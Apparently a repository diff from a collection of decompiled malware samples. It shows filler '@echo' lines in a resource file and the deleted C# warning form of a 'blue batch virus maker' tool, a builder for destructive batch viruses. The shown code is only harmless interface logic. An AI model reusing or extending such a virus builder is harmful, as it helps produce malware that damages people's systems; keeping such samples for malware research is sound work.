@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdj</value>
</data>
</root>

View File

@ -1,210 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: blue_batch_virus_maker_v_2._4.warning_for_the_hal
// Assembly: blue batch virus maker v 2.4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2DAFA7DD-2FE8-4FC2-9A4A-71538C37F4F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Constructor.Win32.BAT.q-08ee2f8c3aa3c7eab228bd2f1b4a63e07fd7671a3929619d4d3486bad87f8200.exe
using blue_batch_virus_maker_v_2._4.My;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace blue_batch_virus_maker_v_2._4
{
[DesignerGenerated]
public class warning_for_the_hal : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private IContainer components;
[AccessedThroughProperty("RichTextBox1")]
private RichTextBox _RichTextBox1;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("Button2")]
private Button _Button2;
[DebuggerNonUserCode]
static warning_for_the_hal()
{
}
[DebuggerNonUserCode]
public warning_for_the_hal()
{
this.Load += new EventHandler(this.warning_for_the_hal_Load);
warning_for_the_hal.__ENCAddToList((object) this);
this.InitializeComponent();
}
[DebuggerNonUserCode]
private static void __ENCAddToList(object value)
{
lock (warning_for_the_hal.__ENCList)
{
if (warning_for_the_hal.__ENCList.Count == warning_for_the_hal.__ENCList.Capacity)
{
int index1 = 0;
int num = checked (warning_for_the_hal.__ENCList.Count - 1);
int index2 = 0;
while (index2 <= num)
{
if (warning_for_the_hal.__ENCList[index2].IsAlive)
{
if (index2 != index1)
warning_for_the_hal.__ENCList[index1] = warning_for_the_hal.__ENCList[index2];
checked { ++index1; }
}
checked { ++index2; }
}
warning_for_the_hal.__ENCList.RemoveRange(index1, checked (warning_for_the_hal.__ENCList.Count - index1));
warning_for_the_hal.__ENCList.Capacity = warning_for_the_hal.__ENCList.Count;
}
warning_for_the_hal.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
}
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (warning_for_the_hal));
this.RichTextBox1 = new RichTextBox();
this.Button1 = new Button();
this.Button2 = new Button();
this.SuspendLayout();
this.RichTextBox1.BackColor = Color.Black;
this.RichTextBox1.ForeColor = Color.Lime;
RichTextBox richTextBox1_1 = this.RichTextBox1;
Point point1 = new Point(12, 12);
Point point2 = point1;
richTextBox1_1.Location = point2;
this.RichTextBox1.Name = "RichTextBox1";
RichTextBox richTextBox1_2 = this.RichTextBox1;
Size size1 = new Size(290, 139);
Size size2 = size1;
richTextBox1_2.Size = size2;
this.RichTextBox1.TabIndex = 1;
this.RichTextBox1.Text = componentResourceManager.GetString("RichTextBox1.Text");
this.Button1.ForeColor = Color.Lime;
Button button1_1 = this.Button1;
point1 = new Point(131, 108);
Point point3 = point1;
button1_1.Location = point3;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
size1 = new Size(159, 36);
Size size3 = size1;
button1_2.Size = size3;
this.Button1.TabIndex = 2;
this.Button1.Text = "You Understand";
this.Button1.UseVisualStyleBackColor = true;
this.Button2.ForeColor = Color.Red;
Button button2_1 = this.Button2;
point1 = new Point(23, 121);
Point point4 = point1;
button2_1.Location = point4;
this.Button2.Name = "Button2";
Button button2_2 = this.Button2;
size1 = new Size(85, 23);
Size size4 = size1;
button2_2.Size = size4;
this.Button2.TabIndex = 3;
this.Button2.Text = "exit";
this.Button2.UseVisualStyleBackColor = true;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.BackColor = Color.Black;
size1 = new Size(314, 155);
this.ClientSize = size1;
this.ControlBox = false;
this.Controls.Add((Control) this.Button2);
this.Controls.Add((Control) this.Button1);
this.Controls.Add((Control) this.RichTextBox1);
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.Name = nameof (warning_for_the_hal);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "warning for the hal.dll batch script";
this.ResumeLayout(false);
}
internal virtual RichTextBox RichTextBox1
{
[DebuggerNonUserCode] get => this._RichTextBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._RichTextBox1 = value;
}
internal virtual Button Button1
{
[DebuggerNonUserCode] get => this._Button1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button1_Click);
if (this._Button1 != null)
this._Button1.Click -= eventHandler;
this._Button1 = value;
if (this._Button1 == null)
return;
this._Button1.Click += eventHandler;
}
}
internal virtual Button Button2
{
[DebuggerNonUserCode] get => this._Button2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Button2_Click);
if (this._Button2 != null)
this._Button2.Click -= eventHandler;
this._Button2 = value;
if (this._Button2 == null)
return;
this._Button2.Click += eventHandler;
}
}
private void warning_for_the_hal_Load(object sender, EventArgs e)
{
}
private void Button1_Click(object sender, EventArgs e)
{
MyProject.Forms.batch_maker.Show();
this.Hide();
}
private void Timer2_Tick(object sender, EventArgs e)
{
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void Button2_Click(object sender, EventArgs e) => ProjectData.EndApp();
private void ProgressBar2_Click(object sender, EventArgs e)
{
}
private void ProgressBar1_Click(object sender, EventArgs e)
{
}
}
}

View File

@ -1,128 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
